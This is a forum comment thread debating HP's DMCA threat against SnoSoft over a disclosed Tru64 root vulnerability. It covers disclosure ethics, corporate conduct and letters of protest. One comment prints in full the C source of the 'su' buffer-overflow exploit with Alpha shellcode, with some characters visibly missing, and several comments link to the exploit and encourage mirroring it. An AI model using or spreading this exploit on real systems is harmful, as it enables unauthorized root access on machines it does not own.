One has to balance law and personal integrity. If things went down the way they were reported - and that's a big if - I would not really be able to stand by this, and would probably air some criticism of HP management. When I was hired, I did negotiate how and when I could criticize the company, and this falls within those parameters. Would I quit? Some people think I should stay around and try to teach them the right thing to do. Not that this would be easier than quitting. But HP isn't going away just because I slam the door on them.

Bruce

Re:Bruce, it's time for you to make a decision

[Bruce+Perens]

Well, did you see this line on the snosoft.com home page?

Our advisory release policy is full disclosure unless bound by contract.

I'm uncomfortable about that line. Thus, I'd better investigate both sides thoroughly.

Bruce

Re:Bruce, it's time for you to make a decision

[Bruce+Perens]

Well, hopefully I get points for not speaking out of ignorance, which is what I would be doing if I were to air a condemnation before I had first-hand data.

Thanks

Bruce

Re:Bruce, it's time for you to make a decision

[drDugan]

read my sig. 100% in agreement

Re:Bruce, it's time for you to make a decision

[Skapare]

... unless bound by contract.

Sounds to me like they are soliciting to be "bought off".

Re:Bruce, it's time for you to make a decision

[Lemmy+Caution]

The question is whether your staying could be counterproductive by continuing to lend legitimacy and a form of sanction to their operation, or whether you could frankly do more good elsewhere. In many ways, your position is comparable to that of Colin Powell's in the Bush Administration, although you are actually a little freer than he is to directly express criticism.

Re:Bruce, it's time for you to make a decision

[crawling_chaos]

hopefully I get points for not speaking out of ignorance

Actually, in some way, that was what I was trying to say, while at the same time being pissed as hell about the profit uber alles attitude of the poster and the entire DMCA bullcrap. Actually, I did better than I usually do. When my emotional side and my intellectual side get into an argument, I usually end up eating a lot of shoe leather.

At any rate, I await more news.

Re:Bruce, it's time for you to make a decision

[Kaa]

It used to be that people believed in ethics -- that there are societal responsibilities that compete with shareholder equity.

The problem is that different people have different ethics.

See, the world isn't composed out of affluent white-bread vaguely-Christian Americans. There is a whole bunch of other people around and they tend to have different, sometimes rather different views.

You want corporations to be ethical? Act for morality reasons rather than for profit reasons? Fine, but don't be surprised if, say, a Saudi oil company would start massive funding of islamic fundamentalists. It is morality, just not yours.

Re:Bruce, it's time for you to make a decision

[evbergen]

Sadly, other than obeying the law, increasing the wealth of shareholders is the only thing companies can be actually held accountable for, because that's what we give them as their sole mission.

Individual people may have ethics, but a corporation is something constructed to generate the maximum amount of wealth, given certain boundaries. That's what we in the western world, who seem to value money above freedom and power above peace, created corporations for.

I'd say the situation is hopeless until our governments become real democracies again, acting on behalf of all people in the best interests of all people -- not just the people with the most money to spend on campaign donations, and not just short term monetary interests. Right now, western governments seem to have accepted the same charter as most corporations: generate the maximum amount of wealth, no matter what. Make Money Fast (TM). And of course, the best way to do it seems to help the existing corporations in every possible way, but certainly not to act against their interests.

Could it be that we are guilty of secretly allowing them to be ruled by the law of the corporate jungle, because we too have started to value the surrogate freedom provided by money above freedom of thinking, freedom of communication, and privacy of our own affairs? The illusion of security provided by an orwellian state above the security provided by an even distribution of power in a democratic world?

But consider this though: the more power we transfer to coporations, the harder it will be to take it back into our own hands. At some point we'll need nothing less than a revolution to re-establish democracy: one man, one vote. Not one dollar, one vote.

C-Net news better look out!

[piznut]

Simply linking to the source code, like they are could get them into trouble, could it not?

http://deepmagic.securify.org.uk:8080/su.c

DMCA and research

[Col.+Klink+(retired)]

HP's dramatic warning appears to be the first time the DMCA has been invoked to stifle research related to computer security.

Um... wasn't that hole Felton/SDMI thing the first time the DMCA was invoked* to stifle research related to computer security?

* Technically, they only threatened to invoke the DMCA. As of now, HP has also only threatened to invoke it.

Re:DMCA and research

[|<amikaze]

Hmmmm Adobe? Dimitry mean anything?

Re:DMCA and research

[LarsG]

wasn't that hole Felton/SDMI thing the first time the DMCA was invoked* to stifle research related to computer security?

I must admit that I was not aware that the discovered weaknesses in audio watermarks enabled someone to gain root access on a server. ;-p

Re:DMCA and research

[seanadams.com]

As of now, HP has also only threatened to invoke it.

Uh, no, "invoking the DMCA" is precicely what HP is doing, though they haven't formally filed a complaint with the feds. How can you possibly defend these unscrupulous fucks? From dictionary.com.

invoke Pronunciation Key(n-vk)
tr.v. invoked, invoking, invokes
...
2. To appeal to or cite in support or justification.
...
5. To resort to; use or apply:
...

Re:DMCA and research

[Col.+Klink+(retired)]

> How can you possibly defend...

Whoa! How can you say I'm defending them? I'm just saying they aren't the first "unscrupulous fucks". If they are "invoking" the DMCA by stating it in a threatening letter, they're still not the first. Felton got a letter that cited the DMCA too.

My only point was that it was silly to claim that this is anything new.

Re:DMCA and research

[Col.+Klink+(retired)]

I was not aware that the discovered weaknesses in audio watermarks enabled someone to gain root access on a server.

But surely you were aware that removing a watermark is done to remove the security that the watermark was intended to impose and allow "unauthorized" access to it.

Q. Who are you?

We are a group of researchers studying computer security and digital watermarking.

Re:DMCA and research

[seanadams.com]

I'm just saying they aren't the first "unscrupulous fucks".

Okay, I may have taken your sentence a little out of context - sorry. But I stand by the rest of my statement.

Re:DMCA and research

[LarsG]

But surely you were aware that removing a watermark is done to remove the security that the watermark was intended to impose

Nay, a watermark does not impose any security. A watermark might be compared to a sign saying "thou shalt not trespass", but not to a lock.

Excerpt from the CNet article

[zaren]

"On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." "

Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.

Re:Excerpt from the CNet article

[fishbowl]

I suppose you'd like an assasins' guild too, so that amateurs and people outside your sphere of influence don't commit murders? It doesn't work that way. Sorry.

Re:Excerpt from the CNet article

[m0rph3us0]

The article says the informed HP about these vuln's a year earlier, in reality it is up to the company to secure their products, mistakes happen, but should Ralph Nader be put in jail for telling people that the Pinto's gas tank would explode on impact?

Re:Excerpt from the CNet article

[dnoyeb]

Yes, HP could possible assume the exploit is not totally public. As it stands, some random Joe posting an exploit says the exploit is mainstream by now...

Re:Excerpt from the CNet article

[Karma+Farmer]

Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way.

No, of course you wouldn't like it. And, if you were an emperor who got suckered into walking around naked, you'd be fairly pissed at the kid who pointed out that you were, in fact, naked.

But, this story has nothing to do with HP "liking" or "not liking" it when people (rightly) point out that they're walking around naked. The story is about the fact that the DMCA has emboldened HP to the point that they feel it's better to walk around naked and sue anyone who notices, rather than buying some reasonable clothes.

Etiquette in the security community demands that the discovers of holes give companies reasonable time to respond to security problems, before publicizing the security problems. But this courtesy is not, in any way, a courtesy towards the company that manufactures the flawed product. That company's opinion in the matter doesn't mean squat. It is a courtesy extended entirely to the users of the product. Users are harmed if they do not know about exploitable flaws in the products they use, but at the same time users are harmed if the exploitable flaws are widely known before patches are available. The only reasonable role for a company with flawed products in the security process is to work diligently to minimize the harm to users, by the only method available to them -- by expediting patches for their products, and thus providing an environment where the user can be informed of security flaws in their product as quickly as possible.

Unfortunately, what HP has done here is imagine itself to have some other role in the security process -- someone at HP is under the completely mistaken impression that their opinion of the security process matters in any way. It does not. The courtesies of the security process are entirely towards the users of the flawed product. People have a right to know about flawed products. HP has the opportunity to provide patches to their product, so that those users might have some alternative to simply throwing all of their HP equipment in the garbage, but that is entirely HP's opportunity, and really of no concern either to the users or to the security professionals who disclose the hole.

Re:Excerpt from the CNet article

[sconeu]

Actually, a year ago, one would have contacted Compaq about Tru64.

Re:Excerpt from the CNet article

[mshiltonj]

If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.

Why? The exploit still exists.

hp wasting valuable engery

[ecalkin]

this is really a shame. hp was one of the technology companies that had a lot going for it.

when you are fighting in a tough market *and* trying to make a merger happen without too much bad stuff, it seems that it is counter-productive to play this game: you make people mad, you spend resources (money and man-hours that could be easily used elsewhere) and you are *not* going to achive the immediate goal of supressing bad stuff (real or imagined).

so hp gets more points in the bad pr column, they waste money, and the problem doesn't go away. i hope that they spin off the printer division before they crash and burn.

eric

p.s. i guess the worst part is that hp *didn't* learn from all the other companies that went down this path.

bugtraq email

Contents of the bugtraq email. Doing anon, fearful of prison buggery:

got fed up of corporate bullshit
here is the warez, nothing special, but it does the job :)
note, this is just one of many many exploitable bofs in tru64 5.x
http://deepmagic.securify.org.uk:8080/su.c
phased
phased@mail

Very Frustrating

How are we to feel secure while computing if it is illegal to check up on the companies providing the software/hardware solutions?

Imagine if you would, a secure piece of software ( or a secure piece of hardware ) is sold to handle monitary transactions, no-one can verify that the software/hardware is infact secure ... except the criminals who are going to exploit the vulerability and steal hard earned money.

Yeah for the DMCA for protecting corporations instead of the individual!

my 2 cents.

Dear HP

[T3kno]

I will never buy another one of your products, and I am seriously considering returning the ones that I have. I am in the position that has a great deal of spending power and 95% of the say as to what my company purchases, and I will never purchase an HP or Compaq product again. Thank you very much.

Sincerely,

A Former Customer.

Re:Dear HP

[T3kno]

Actually, since I buy all of my equipment from resellers instead of directly from HP, I really have no idea how or who to contact there. I'm looking at their site right now for a mailing address, or an email address that is not a bitbucket. If you have any suggestions on who to contact let me know. I fully intend to send them a more thorough version of this letter along with numbers and a shiny picture of my ass.

Re:Which Part of the DMCA?

[dimator]

The part that says "Thou shalt not give multi-billion dollar companies, who buy laws, a hard time."

Re:lets hope they do...

[JoeBuck]

Take it to court and maybe lose, even if any sane reading of the Bill of Rights suggests otherwise.

Unfortunately, the courts are full of judges in their 60s with superstitious beliefs about computers and terror of hackers. The government lawyers will smear these guys up one side and down the other, exploiting every error they made, like calling their exploit "warez", a term commonly used for "stolen" code.

In other news

[m0rph3us0]

in other news today the FBI raids the offices of SnoSoft in search of DMCA prohibited cracking tools, they immediately sieze compilers, source code, and felt markers.

Security through [mrf! Grbbl--!]

[KFury]

So does this a sign that Microsoft will once again(?) be a secure platform, because now in addition to:

• Securith through Obscurity

and

• Security through Diligence

we now add the mighty

• Security through Litigation?

To be fair, when do the handgun designers go to jail again?

Re:Security through [mrf! Grbbl--!]

[dattaway]

This is like Ford suing the Insurance Institute of America for rating a car low in side collision performance and publishing that fact.

Its much worse than that. Its like Ford suing the mechanices for fixing the defective bumper on your Pinto that makes it blow up.

HP is the King and you shalt not degrade His reputation.

DMCA Violation?

[_LFTL_]

Ok someone fill me in here:

How on earth does a law pertaining to the circumvention of copyright protection systems apply at all to someone releasing a security flaw in an operating system?

Re:DMCA Violation?

[fishbowl]

It does not. And if everyone involved has the guts to go ahead and let a jury decide, we might ALL be better off. Until someone does this, it's an open question whereby the mere threat of anything and everything is enough to control the behavior of individuals.

Re:DMCA Violation?

[buss_error]

And if everyone involved has the guts to go ahead and let a jury decide, we might ALL be better off.

It is one thing for a MegaCorp to slam down a few million on litigation, it's another for me to pay to fight it. Am I really willing to go to the poor house over this issue? Am I really willing to throw away a fair job, an OK home, and my car?

The problem in the US is that justice is bought and paid for. If you don't have the cash, you are part of the trash. Trash gets swept up. No, the only real effective course of action is to start bitching to office seekers and to stop paying for Intellectual Property. Swap CD's, swap DVD's, for God's sake read a book from the library. But don't shell out bucks for IP anymore. The profit they make is part of the club they are using against us.

If no one purchased what Sony is selling, how long do you think Sony would stay in business? If we boycott RIAA members, how long would it be until Ms. Rosen had to go earn an honest living?

Look, it's not a problem if you fall off the wagon. Just take the amount of money you spent on that CD, movie or DVD and send a like amount to the EFF.

OK, so I'm a broken record.

Re:DMCA Violation?

[inerte]

Am I really willing to go to the poor house over this issue? Am I really willing to throw away a fair job, an OK home, and my car?

Okay, what if you don't? What if we resist peacefully the DMCA?

What would happen if we allow everyone to be prosecuted? I bet that when the count comes to 150 person prosecuted, it will be over forever.

I am close to the point of saying, let them come, and I am not even from the USA, but my country does mimic a lot of things that happen there (we also have a corrupt governament, who doesn't?)

While weighting the personal and monetary costs to resist these stupid laws, and letting my own sacrifice, I am slightly pending to the sacrifice side.

It looks like doesn't matter how much we discuss, how much these things look and in effect, are stupid, how much they TRULY hold innovation, information, and ultimately knowledge (Middle Age's church, anyone?), nothing will change.

It's apathic to just discuss these things. Damn, if I were full of prejudice I could say that nerds are naturally more headed to talk and understand than most people.

Imagine you walking to your grandma and saying to her: "Gran, if you look at this recipe, YOU WILL GO TO JAIL. If you decide to change the ingredients, YOU WILL GO TO JAIL. If you distribute the recipe to your friends, YOU WILL GO TO JAIL".

Ha, the way things are, not even paraboles will suffice.

Now, recipes are pretty cheap compared to source code, I know. One has aggregated value, and the other doesn't. But is this the society that we want to live?

Hell no! It's not only information that I want, I NEED, and other people NEED too, that should be free.

I don't know when the ranting will be over, hold on. Anyway, look at the future we are leaving to our children. This isn't good. This is good to a couple executives with their ass already so full of money that they can pretend that they give (or "donate") this money, because it will generate MORE to them! The corporative world is full of "social marketing" these days, and well, D'oh! Who believes that 99% of this crap is because suddenly companies want to go to heaven?

No. It's acceptable to a point, isn't? Have we come to the limit? Have we reached the suffering treshold that we allow ourselfs to live in? Can we feel more deeply attacked on what we believe?

Hell yes! We can! And that's the sad part. Slashdotters don't go to the street and make a DMCA riot because they (me too) are sweet little lazy bastards that think, hey, this one here isn't a big deal, this one here too. Oh, that one back in 1998 wasn't too, even if added with this one.

I mean, we have the EFF to protect us, right? We have the power to decide about what the company we work will buy, right?

WRONG! While all these gigantic bastards are spending millions on advertisement to talk about the "Digital Revolution", I say: What?

Are you coming to tell me, someone who breaths computers 24/7, what is best to me in computer terms?

Hell! Do the following if you work for a company that you DON'T like: Quit! If the company that you work makes deal with other companies that you think that will compromise your vision of the future, QUIT!

Do you think that is it so hard to make a personal sacrifice to a better world?

Blah, now I may resume my normal activities.

Re:DMCA Violation?

[rodgerd]

What would happen if we allow everyone to be prosecuted? I bet that when the count comes to 150 person prosecuted, it will be over forever.

The US have imprisioned literally millions of people in the "drug war", many of whom have committed the sin of smoking dried plant leaves because they like the way it makes them feel 20 IQ points dumber. The fact that this has not retarded drug use and has made drug barons fantastically rich hasn't altered the determination of the US government to put people in jail (and a whole bunch more).

The idea that jailing a few hundred people for DMCA violations would make lawmakers think twice is fanciful.

DL & P2P it

[gearheadsmp]

Here's the source, baby!

Wonder if anyone could countersue?

[fishbowl]

A big customer could claim this damages their ability to operate and sue HP for suppressing information, the absense of which could lead to increased vulnerabilities in their systems.

It's too bad that people have egos, also, because if things like hard crypto implementations, security information, and so on were simply released anonymously into various outlets (e.g., not just the net), there would be nobody to sue.

In this case I think there won't be anybody to sue either -- the individual who made the report might not be subject to US law.

Take this to its logical conclusion, and realize that computer systems in the USA will tend to be less secure than their counterparts in free countries that do not suppress information exchange. I wish it were simpler to relocate to Europe; it sure as hell appears to be easy for them to relocate to the USA.

Ridiculous

[dh003i]

The public has the right to know about these security flaws, just as much as we have the right to know if the tires we buy pass safety standards.

HP trying to cover this up just proves its a problem. HP is using the DMCA to prevent people from discussing valid flaws in their OS'.

People have the right to know if the car they're driving -- or are going to buy -- is unsafe. Why? Because their lives depend on it, literally. For the same reason, people have the right to know if the OS they're using is secure. Why? Because their lives depend on it, or at least their carreers. Data important to one's carreer (i.e., scientific experimental data) is stored on one's computer. Private information -- i.e., credit card information -- is stored on a computer. Security holes can literally destroy one's life.

We have the right to know exactly what problems their are in our software.

Re:Ridiculous

[metacosm]

Why isn't this common sense is my question. This is such a basic concept. Do we create locks and make it a crime for even the home owner to test them?

This issue has reached silly levels, and there is no one willing to step up and point out how stupid it is. It is a frustrating day.

Re:Ridiculous

[Danse]

Exactly, and if I found a problem and notified MasterLock and they didn't care, and then I go to the local news channel and they air a piece about it, would they be sued? I doubt it. I think this kind of crap has got to stop and the law that makes it possible has got to go.

Re:Ridiculous

[dh003i]

So, if a car company sells u a car with a contract that endangers u, that's legit? This is like saying Ford can sell you a car but deny you the right to notify others of problems with it. Its invalid.

Be thankful...

[natefaerber]

The DMCA just made this world a safer place.

Don't ask, don't tell.

as a Tru64 admin...

[Corgha]

This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...

Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.

Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).

It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.

Re:as a Tru64 admin...

[Corgha]

...you have probably tested the code?

Whether the exploit works or not is really irrelevant to me. It's HP's reaction that has me ticked.

Let us suppose that the exploit is a hoax. The proper reaction, IMHO, would be to demonstrate that the vulnerability does not work. The fact that they are threatening legal action indicates two things: They see

Re:Bruce is 2 faced, so expect him

Theo... is that you?

Tell HP's CEO what you think!

[Arcturax]

Email their president and CEO from this page!

Tell her in NICE non flaming tones why you feel what they are doing is wrong. Explain that this kind of action makes you unwilling to buy any more products from them.

Re:Tell HP's CEO what you think!

Dear Ms. Fiorina,

I just read about your company's threat of action under the DMCA against a security researcher who released exploit information about your Tru64 Unix product. As a software engineer working for a large competitor of yours, I'd like to thank you for your actions. The well-earned reputation for security and reliability of our product can only be enhanced by ill-mannered attempts at suppressing information from your company. Any further help you can provide in assuring my future job security in this uncertain economy will be greatly appreciated.

Re:Tell HP's CEO what you think!

[LWolenczak]

Dear Whoever gets this email,

I find it interesting that HP has decided to go after a security anaylist who found a bug in tru64, using the DMCA, which does not apply and virtually threatening him with a half million liabilty lawsuit under that law. Vunerablity information should be known by all. HP is clearly making its reputation look very bad with this action. Soon, if you continue, I'm sure it will end up just like the DVD CCA fiasco. Its just that HP clearly has no case. Any reasonable judge would see HP's actions as a threat. This reeks, it reminds me of some other large companies that are being investigated by the SEC or who have had to file for chapter 11.

Good Day.

Re:Tell HP's CEO what you think!

[Arcturax]

Replying to my own post is silly, but here is mine.

Dear Ms. Fiorina,

I read on Slashdot.org that your company is suing a group of security experts for pointing out a flaw in your Tru64 UNIX operating system and warning others about it via SecurityFocus.com. As a buffer overflow is a rather trivial thing to fix, and you've apparently known about it for a while, I wonder why your programming team did not simply fix the bug and release a patch? That would certainly make a lot more sense than expensive lawyers and damaging your corporate image by using the DMCA as a censorship tool.

I will add that where I work, we have purchased several HP Unix machines and seeing this kind of reaction to a security hole instead of fixing it and thanking SnoSoft for pointing it out concerns me greatly. We don't use Tru64, but if this is how you deal with security holes in your products, ignoring it and trying to cover it rather than fixing it, it doesn't make companies, small or large very keen on continuing to purchase your hardware or software.

So I urge you to put pressure on those in your company who need it to retract their claim against SnoSoft, instruct your programmers to fix the hole and release a patch, and finally, apologize to those your company has threatened to sue under the DMCA for simply doing their jobs, which is to audit software and warn others about security problems they should know about.

Sincerely,

So This is the, "New HP?"

[ewhac]

HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."

As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.

Schwab

Quoting Gus from TrippingTheRift...

[leonbrooks]

`Oh, now _this_ is fair!'

Babelfish Translation

[shokk]

For those of you who are HPaq-ese impaired, here is the message:

Dear HPaq customers,
We thank you for having purchased our products in the past, but now that we have finalized our merger and cashed our options, we have lost our minds and come to the boggling conclusion that we don't want your money anymore. Please do not buy our products because honestly you can't trust us to inform you when there is a defect with our product. This includes any servers, and handhelds our merger partner might peddle, printers, or whatever the hell it is these people do. As a sign of our gratitude for your service, we will be providing each future customer with a free Berber mousepad under which you can sweep any problems you discover. I you believe the problem doesn't exist, and we believe the problem doesn't exist, then we can work together to warp reality and drive cusomers away like poor starving slobs on the street corner to a free luncheon. Personally, I don't recommend you use these things in anything that might risk a human life or attempt to improve society in any way. Heck, I wouldn't run my porn servers on this crap. Well, gotta run, muy coke dealer is here. And don't forget to F off!

P.S. - Don't unravel the mousepad to see how it's made or we'll sue your ass into orbit under the DCMA.

In case anyone wants it...

[User+956]

You can download the source code here.

Great - Let this be our poster child

[jfrumkin]

What a perfect example - a really easy to demonstrate abuse that the DMCA allows. Hell, I could show this case to my non-techie relatives, and they'd understand just how wrong it is. Go HP - this type of bullying helps more then 10 highly payed lobbiests.

Re:let me see if I get this right

[xigxag]

HP should be thanking them

This is a bad thing for HP. The thing is, hackers love to share their code with the world. And there are two ways to exploit that obsessive desire, either through good (white hat) mechanisms or through bad (cracker) mechanisms. If HP prevents hackers from researching exploits in a legitimate fashion, it won't stop the hackers -- they'll just only leak their hacks onto Eastern European warez websites outside of the reach of US law. HP won't be aware of anything until it's too late and millions of dollars of damage have already been done by malicious parties. It's like that old saw about gun ownership: When hacking software is a crime then only criminals will hack your software.

news.com.com also vulnerable

[sparkz]

Their article also supplies the link in their article ... and so does Slashdot, now ... Sue them all?

Why not just all mirror this code, let HP figure that one out...

Re:Don't blame HP

[Quixote]

Some people seem to forget that the real villain here is the US Government, who made DMCA into law.

Yep. Murderers don't kill people; guns do! Don't send the murderers to jail; go after the gun manufacturers.

The USC made a stupid law; just because a stupid law exists it does not mean that it should be used to quash legitimate research. If Carly had half a brain, she would fire the idiot VP and apologize to Snosoft. But don't count on it happening anytime soon.

Do you mean this source code?

[User+956]

#include stdio.h
#include stdlib.h
#include string.h
#include unistd.h

char shellcode[]= "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "xff\xff\xff\xff" "x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";

main(int argc, char *argv[]) {
int i, j; char buffer[8239]; char payload[15200];
char nop[] = "\x1f\x04\xff\x47"; bzero(&buffer, 8239); bzero(&payload, 15200); for (i=0;i8233;i++) buffer[i] = 0x41;

buffer[i++] = 0x01; buffer[i++] = 0x04;
buffer[i++] = 0x01; buffer[i++] = 0x40;
buffer[i++] = 0x01;

for (i=0;i15000;) { for(j=0;j4;j++) { payload[i++] = nop[j]; } }
for (i=i,j=0;jsizeof(shellcode);i++,j++)payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}

Re:Do you mean this source code?

[Wrexen]

I think the truly impressive part of this code is getting past the lameness filter... that's gotta be against some law

Re:let me see if I get this right

[liquidsin]

You're close, but I don't think you have it quite right. You're still thinking like the old america. In the old america, it could actually be a half a million dollar *lawsuit*. But nowadays, it's a half a million dollar *fine*. Copyright isn't a civil matter anymore. This is a felony, according to the new laws.

Security Issues

[aebrain]

It's worthwhile taking some lessons from history. Time was, there was a huge debate in the press - somewhat before George Washington - about whether Locksmiths should publish data about vulnerabilities of locks.

The answer that was eventually arrived at was "Of course, because the professional crooks already know the vulnerabilities, and to publish would reveal to the customers what shoddy goods some locks were, and help improve the state of the art." (sorry, I've been unable to find some quotes on the web). The parallels are obvious.

Another parallel : see the Associated Locksmiths of America's Code of Ethics.

What about the investors?

[global_diffusion]

But apache doesn't have to support as many investors as HP does. Think about the investors. If this bug were to be reported, these poor, defenseless investors would lose money. You don't want them to lose money, do you? That wouldn't be very nice of you.

Re:What about the investors?

[afidel]

Actually, if they have had knowledge of a vulnerability for a year and been unable/willing to fix it and then pulled a stunt like this, then yes I DO want them to lose money, because rewarding bad companies with our investment dollars is one of the biggest problems with the economy today. Damn the numbers, product, customer or anything else as long as the stock price stays up!

Re:What about the investors?

[WNight]

I know that's a joke, but... Yes, I do want investors to lose money. Too many people see their investments as something the government should protect. Sorry, invest in a company that's shady, lose money. Wah.

Too much of the Microsoft anti-trust trial seemed to be based on what finding them guilty (and applying a real punishment) would do to their stock price. Not only did I not see any consideration for the stock prices of the companies MS destroyed through their illegal actions, but I also didn't see any concern for the law. It's like when an athlete breaks the law (rape, drugs, etc) and gets a slap on the wrist because they're famous and the team really needs them.

Oh, and I wouldn't mind seeing some execs go to jail. I think Rambus's leaders need a little, for the fraud they committed. Real jail too, not play jail.

Subtle attack on the DMCA?

[aebrain]

Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.

Dear Ms. Fiorina

[Gerdts]

Posted at http://www.hp.com/hpinfo/execteam/email/fiorina/in dex.htm

I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.

The first issue is HP's request that Bruce Parens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.

The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.

Please reconsider your decision to use the Digital Millenium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.

I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.

Re:Dear Ms. Fiorina

[zerocool^]

Dear Ms. Fiorina

I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-hundred dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.

We're the ones that need to make descisions

[Inexile2002]

It just occurred to me thinking over this issue that HP and the other major corporations have made their positions plain - they have decided how they are going to deal with our ability to easily disseminate and copy information. The government has decided what it is going to do in regards to this issue - that is to side unilaterally with the corporations against it's constituents.

Interestingly, we've decided what we're going to do too. Anyone reading this post (trolls and whoever is pressing refresh in attempts to get fp excepted) has already pretty much decided about how they feel. Most /. readers to one degree or another favor the rights of the individual to express him or her self, to share information and to act to actively uphold those ideals.

And one of the brilliant things about /. is that it provides us with a forum to sound off and occasionally mobilize.

What many of us (me included) need to do is really figure out exactly how we're going to react to all of this. Not just what I'm going to think, but what I'm going to actually do. This sort of thing threatens our personal freedoms, in some cases threatens our livelyhood, threatens shared resources that we hold to be valuable etc...Cheering on the occasional script kiddie who DoS's a corporate server isn't enough.

Not trying to start a revolution here, just trying to clarify my thinking in a public place...

Why help those companies anyway?

[g4dget]

So, HP wants third parties to supply them with bug reports and fixes but not to have that information become public. So, basically, HP wants third parties to do their quality control and bug fixing for them for free, without even the scrutiny and quality control that goes along with an open process. And if you merely report publically that a bug and want to get paid in order to fix it, you run the risk of getting accused of blackmail.

I'd say: why help those companies in the first place? They charge an arm and a leg for their defective software, let them fix it themselves. If their software doesn't work as advertised, sue them if your contract permits it, or switch to something else. Don't waste your time and money on doing some vendor's quality control for them.

I don't see the problem

[tlambert]

Unless they are doing it for the credits, there no reason at all to not simply release the source code anonymously, without claiming any credit for it whatsoever.

No credit -> No blame

I can see HP's problem... the posting referrred to the exploit as "warez", so it was a "r3534r(|-|3r" and not a "researcher" -- some kid working on his PhD -- who came up with the exploit, from all evidence. Being realistic, they *have* to bluster and otherwise overreact: they have a fiduciary responsibility for professional feather ruffling, given the apparent source of the expliut.

Alternately, they could always *fix* the problem...

-- Terry

Re:I don't see the problem

[fishbowl]

"Being realistic, they *have* to bluster and otherwise overreact: they have a fiduciary responsibility for professional feather ruffling, given the apparent source of the expliut."

That strategy could easily backfire, when the "kid" turns out to be a CS professor at Berlin or Cern. Or a US Defense agency. You get the idea. (Unfortunately, it NEVER works out to poetic justice like that.)

Re:I don't see the problem

[tlambert]

CS professors rarely go by handles, such as "Phased", as in this case. I'm sure if it ever happened, they'd simply spin-doctor it, and be done with it, since it would lack utility as a means of brow-beating people.

The purpose of the publication in this case was clearly a matter of "street cred" for the person publishing, and for the security consulting company that the person was trying to promote.

Far be it for me to agree with Thomas C Greene of TheRegister, but it seems to me that there are a lot of people these days who publish exploits in the name of little known security consulting companies, in order to get contracts for those same companies, based on having established a reputation.

The publication in this case has a purpose which is deeper than simply publishing information for the public good, which could have been achieved by publishing the same information anonymously.

As a community, we do ourselves an incredible injustice by lining up to defend everyone who posts an exploit as if they were an associate professor at MIT. And that's exactly the perception that the initial commentary and posting to Slashdot of this article tried to imply.

The only way to win the right for *everyone* to do this kind of research is to align yourself with researchers which are beyond reproach. The recent DeCSS decision against 2600, and its non-appeal of the decision were based on the fact that they were unsympathetic defendants. The only way to win is to ensure that the test cases are not all against unsympathetic defendants.

-- Terry

Re:I don't see the problem

